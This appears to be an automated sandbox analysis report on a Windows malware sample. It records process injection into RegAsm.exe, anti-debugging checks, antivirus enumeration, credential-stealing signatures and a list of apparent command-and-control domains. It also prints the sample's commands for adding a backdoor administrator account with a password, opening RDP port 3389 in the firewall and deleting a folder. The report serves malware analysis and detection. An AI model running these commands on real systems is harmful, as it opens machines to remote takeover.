                                Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004476D0 LdrInitializeThunk,8_2_004476D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D016
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]2_2_004014AD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]2_2_0040148A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]2_2_004014A2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418599 mov eax, dword ptr fs:[00000030h]2_2_00418599
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041859A mov eax, dword ptr fs:[00000030h]2_2_0041859A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,2_2_0040884C
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: Debug
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D016
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041D98C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042762E SetUnhandledExceptionFilter,2_2_0042762E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C11B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C11B66C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C11B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C11B1F7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C2CAC62
                                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
                                Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                                Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                                Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                                Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D4212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02D4212D
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
                                Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wallkedsleeoi.shop
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004124A8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0041257F
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 33B008Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000Jump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 610008Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 936008Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exitJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040111D cpuid 2_2_0040111D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410DDB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0042B0CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0042B1C1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429A50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0042B268
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0042B2C3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0042AB40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_004253E3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0042B494
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_0042749C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,2_2_0042B556
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429D6E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0042E56F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00427576
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00428DC4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B5E7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B580
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0042B623
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,2_2_0042E6A4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeQueries volume information: C:\ProgramData\IDBAFHDGDG.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeQueries volume information: C:\ProgramData\GIIIIJDHJE.exe VolumeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeQueries volume information: C:\ProgramData\AFHDGDGIID.exe VolumeInformation
                                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,2_2_0041C0E9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00410C53
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410D2E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                Source: RegAsm.exe, 00000002.00000002.2452955008.000000000077A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR
